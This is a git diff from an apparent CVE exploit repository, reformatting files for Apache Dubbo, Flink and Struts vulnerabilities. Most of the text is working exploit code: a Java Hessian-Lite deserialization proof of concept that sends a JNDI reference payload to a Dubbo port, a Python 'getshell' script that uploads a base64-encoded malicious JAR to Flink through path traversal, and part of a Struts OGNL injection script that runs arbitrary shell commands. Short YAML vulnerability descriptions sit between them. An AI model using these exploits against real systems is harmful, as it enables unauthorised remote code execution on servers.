-        //todo 此处填写被攻击的dubbo服务提供者地址和端口
-        Socket socket = new Socket("127.0.0.1", 20880);
-        OutputStream outputStream = socket.getOutputStream();
-        outputStream.write(payload);
-        outputStream.flush();
-        outputStream.close();
-        System.out.println("\nsend!!");
-    }
-
-
-    public static class Reflections{
-        public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{
-            Field field=null;
-            Class cl = obj.getClass();
-            while (cl != Object.class){
-                try{
-                    field = cl.getDeclaredField(fieldName);
-                    if(field!=null){
-                        break;}
-                }
-                catch (Exception e){
-                    cl = cl.getSuperclass();
-                }
-            }
-            if (field==null){
-                System.out.println(obj.getClass().getName());
-                System.out.println(fieldName);
-            }
-            field.setAccessible(true);
-            field.set(obj,fieldValue);
-        }
-
-        public static <T> T createWithoutConstructor(Class<T> classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
-            return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
-        }
-
-        public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
-            Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
-            objCons.setAccessible(true);
-            Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
-            sc.setAccessible(true);
-            return (T) sc.newInstance(consArgs);
-        }
-    }
+package com.bitterz.dubbo;
+
+import com.alibaba.com.caucho.hessian.io.Hessian2Output;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.xbean.naming.context.ContextUtil;
+import org.apache.xbean.naming.context.WritableContext;
+import sun.reflect.ReflectionFactory;
+
+import javax.naming.Context;
+import javax.naming.Reference;
+import java.io.ByteArrayOutputStream;
+import java.io.OutputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.net.Socket;
+import java.util.HashSet;
+import java.util.Random;
+public class HessianLitePoc {
+
+    public static void main(String[] args) throws Exception {
+
+        Context ctx = Reflections.createWithoutConstructor(WritableContext.class);
+        Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/");
+        ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx);
+
+//        Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName");
+//        fullName.setAccessible(true);
+        Reflections.setFieldValue(binding, "fullName", "<<<<<");
+//        fullName.set(binding, "<<<<<");  // 方便定位属性值的
+
+
+
+        byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1};
+        //############################################################################################
+        // 写入binding
+        ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream();
+        Hessian2Output outBinding = new Hessian2Output(binding2bytes);
+        outBinding.writeObject(binding);
+        outBinding.flushBuffer();
+        //############################################################################################
+        // binding序列化后的byte数组
+        byte[] bindingBytes = binding2bytes.toByteArray();
+
+        // header.
+        byte[] header = new byte[16];
+        // set magic number.
+        Bytes.short2bytes((short) 0xdabb, header);
+        // set request and serialization flag.
+        header[2] = (byte) ((byte) 0x80 | 0x20 | 2);
+        // set request id.
+        Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+        // 在header中记录 序列化对象 的长度，因为最后一个F被覆盖了，所以要-1
+        Bytes.int2bytes(bindingBytes.length*2-1, header, 12);
+
+        // 收集header+binding
+        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+        byteArrayOutputStream.write(header);
+        byteArrayOutputStream.write(bindingBytes);
+        byte[] bytes = byteArrayOutputStream.toByteArray();
+
+        //############################################################################################
+        // 组装payload = header+binding+binding
+        byte[] payload = new byte[bytes.length + bindingBytes.length -1];
+        for (int i = 0; i < bytes.length; i++) {
+            payload[i] = bytes[i];
+        }
+
+        for (int i = 0; i < bindingBytes.length; i++) {
+            payload[i + bytes.length-1] = bindingBytes[i];
+        }
+        //############################################################################################
+
+        // 修改flag的值
+        payload[2] = 0x02;
+
+        // 输出字节流的十六进制
+        for (int i = 0; i < payload.length; i++) {
+            System.out.print(String.format("%02X", payload[i]) + " ");
+            if ((i + 1) % 8 == 0)
+                System.out.print(" ");
+            if ((i + 1) % 16 == 0 )
+                System.out.println();
+        }
+        System.out.println();
+        // 输出byte数组转String
+        System.out.println(new String(payload,0,payload.length));
+//        System.exit(1);
+        //todo 此处填写被攻击的dubbo服务提供者地址和端口
+        Socket socket = new Socket("127.0.0.1", 20880);
+        OutputStream outputStream = socket.getOutputStream();
+        outputStream.write(payload);
+        outputStream.flush();
+        outputStream.close();
+        System.out.println("\nsend!!");
+    }
+
+
+    public static class Reflections{
+        public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{
+            Field field=null;
+            Class cl = obj.getClass();
+            while (cl != Object.class){
+                try{
+                    field = cl.getDeclaredField(fieldName);
+                    if(field!=null){
+                        break;}
+                }
+                catch (Exception e){
+                    cl = cl.getSuperclass();
+                }
+            }
+            if (field==null){
+                System.out.println(obj.getClass().getName());
+                System.out.println(fieldName);
+            }
+            field.setAccessible(true);
+            field.set(obj,fieldValue);
+        }
+
+        public static <T> T createWithoutConstructor(Class<T> classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+            return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
+        }
+
+        public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+            Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
+            objCons.setAccessible(true);
+            Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
+            sc.setAccessible(true);
+            return (T) sc.newInstance(consArgs);
+        }
+    }
 }
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md
index b47312f3..f39e0a8e 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md
@@ -1,5 +1,5 @@
-漏洞描述
-
-Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。
-Hessian-Lite在遇到序列化异常时会输出相关信息，这可能导致触发某些恶意定制的Bean的toString方法，从而引发RCE攻击
+漏洞描述
+
+Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。
+Hessian-Lite在遇到序列化异常时会输出相关信息，这可能导致触发某些恶意定制的Bean的toString方法，从而引发RCE攻击
 编译ExecTest.java，随后在HttpServer.java中修改ExecTest.class的路径，然后执行HttpServer.main方法，最后执行HessianLitePoc.main方法
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
index faf28d8b..2f25d5ee 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
@@ -1,20 +1,20 @@
-id: CVE-2021-25641
-source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
-info:
-  name: Dubbo是一个高性能优秀的服务框架。
-  severity: CRITICAL
-  description: |
-    每个Apache Dubbo服务器都会设置一个序列化id，告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本，攻击者可以通过篡改字节序码标志（即不遵循服务器的指令）来选择提供程序将使用的序列化 ID。这意味着，如果弱反序列化程序（如 Kryo 和 FST）以某种方式在代码范围内（例如，如果 Kryo 在某种程度上是依赖项的一部分），则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序，然后继续利用它。
-  scope-of-influence:
-    Dubbo 2.5.0 - 2.6.9
-    Dubbo 2.7.0 - 2.7.8
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2021-25641
-    cwe-id: CWE-502
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-25641
+source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
+info:
+  name: Dubbo是一个高性能优秀的服务框架。
+  severity: CRITICAL
+  description: |
+    每个Apache Dubbo服务器都会设置一个序列化id，告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本，攻击者可以通过篡改字节序码标志（即不遵循服务器的指令）来选择提供程序将使用的序列化 ID。这意味着，如果弱反序列化程序（如 Kryo 和 FST）以某种方式在代码范围内（例如，如果 Kryo 在某种程度上是依赖项的一部分），则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序，然后继续利用它。
+  scope-of-influence:
+    Dubbo 2.5.0 - 2.6.9
+    Dubbo 2.7.0 - 2.7.8
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-25641
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
   tags: cve2021, Apache Dubbo
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
index 1ba752b3..c37c98d4 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
@@ -1,20 +1,20 @@
-id: CVE-2021-43297
-source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297
-info:
-  name: Dubbo是一个高性能优秀的服务框架。
-  severity: CRITICAL
-  description: |
-    Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中，在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息，这可能导致触发某些恶意定制的Bean的toString方法，从而引发远程代码执行。
-  scope-of-influence:
-    Dubbo Hessian-Lite ≤ 3.2.11
-  reference:
-    - https://help.aliyun.com/document_detail/390193.html
-    - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww	
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2021-43297
-    cwe-id: CWE-502
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-43297
+source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297
+info:
+  name: Dubbo是一个高性能优秀的服务框架。
+  severity: CRITICAL
+  description: |
+    Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中，在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息，这可能导致触发某些恶意定制的Bean的toString方法，从而引发远程代码执行。
+  scope-of-influence:
+    Dubbo Hessian-Lite ≤ 3.2.11
+  reference:
+    - https://help.aliyun.com/document_detail/390193.html
+    - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww	
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-43297
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
   tags: cve2021, 数据泄漏
\ No newline at end of file
diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
old mode 100755
new mode 100644
index c78850f5..d3d4caa3
--- a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
+++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
@@ -1,30 +1,30 @@
-import requests
-import base64
-import json
-import sys
-import cStringIO
-#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA"
-def main():
-    if len(sys.argv) == 1 or sys.argv[1] == '-h':
-        print('Usage :python2 flink-getshell.py http://example.com:8081')
-        exit()
-    url = sys.argv[1]
-    jobmanager_config_dir = url + '/jobmanager/config'
-    upload_jar_url = url + "/jars/upload"
-    r1 = requests.get(jobmanager_config_dir,verify=False)
-        #data = json.loads(req.text)[2]['value']
-    data = json.loads(r1.text) 
-    for i in data:
-        #print(i['key'])
-        if i['key'] == "web.tmpdir":
-            flink_webdir = i['value']
-            print("webdir:%s" % flink_webdir)
-    file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
-    files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')}
-    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
-    print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
-
-if __name__ == "__main__":
-    main()
-
-
+import requests
+import base64
+import json
+import sys
+import cStringIO
+#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA"
+def main():
+    if len(sys.argv) == 1 or sys.argv[1] == '-h':
+        print('Usage :python2 flink-getshell.py http://example.com:8081')
+        exit()
+    url = sys.argv[1]
+    jobmanager_config_dir = url + '/jobmanager/config'
+    upload_jar_url = url + "/jars/upload"
+    r1 = requests.get(jobmanager_config_dir,verify=False)
+        #data = json.loads(req.text)[2]['value']
+    data = json.loads(r1.text) 
+    for i in data:
+        #print(i['key'])
+        if i['key'] == "web.tmpdir":
+            flink_webdir = i['value']
+            print("webdir:%s" % flink_webdir)
+    file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
+    files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')}
+    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
+    print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
+
+if __name__ == "__main__":
+    main()
+
+
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py
index 1551ebac..856fc4fc 100644
--- a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py
+++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py
@@ -1,163 +1,163 @@
-# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
-# Date: 08/18/2020
-# Exploit Author: West Shepherd
-# Vendor Homepage: https://struts.apache.org/download.cgi
-# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
-# CVE : CVE-2019-0230
-# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
-# Source(s):
-# https://github.com/PrinceFPF/CVE-2019-0230
-# https://cwiki.apache.org/confluence/display/WW/S2-059
-# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
-
-# !/usr/bin/python
-from sys import argv, exit, stdout, stderr
-import argparse
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-import logging
-
-
-class Exploit:
-    def __init__(
-            self,
-            target='',
-            redirect=False,
-            proxy_address=''
-    ):
-        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-        self.target = target
-        self.session = requests.session()
-        self.redirect = redirect
-        self.timeout = 0.5
-        self.proxies = {
-            'http': 'http://%s' % proxy_address,
-            'https': 'http://%s' % proxy_address
-        } \
-            if proxy_address is not None \
-               and proxy_address != '' else {}
-        self.query_params = {}
-        self.form_values = {}
-        self.cookies = {}
-        boundary = "---------------------------735323031399963166993862150"
-        self.headers = {
-            'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
-            'Accept': '*/*',
-            'Connection': 'close'
-        }
-        payload = "%{(#nike='multipart/form-data')." \
-                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
-                  "(#_memberAccess?(#_memberAccess=#dm):" \
-
-"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
-\
-
-"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
-\
-                  "(#ognlUtil.getExcludedPackageNames().clear())." \
-                  "(#ognlUtil.getExcludedClasses().clear())." \
-                  "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
-
-"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
-\
-
-"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
-                  "(#p=new
-java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
-
-"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
-\
-
-"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
-\
-                  "(#ros.flush())}"
-
-        self.payload = "--%s\r\nContent-Disposition: form-data;
-name=\"foo\"; " \
-                       "filename=\"%s\0b\"\r\nContent-Type:
-text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
-                           boundary, payload, boundary
-                       )
-
-    def do_get(self, url, params=None, data=None):
-        return self.session.get(
-            url=url,
-            verify=False,
-            allow_redirects=self.redirect,
-            headers=self.headers,
-            cookies=self.cookies,
-            proxies=self.proxies,
-            data=data,
-            params=params
-        )
-
-    def do_post(self, url, data=None, params=None):
-        return self.session.post(
-            url=url,
-            data=data,
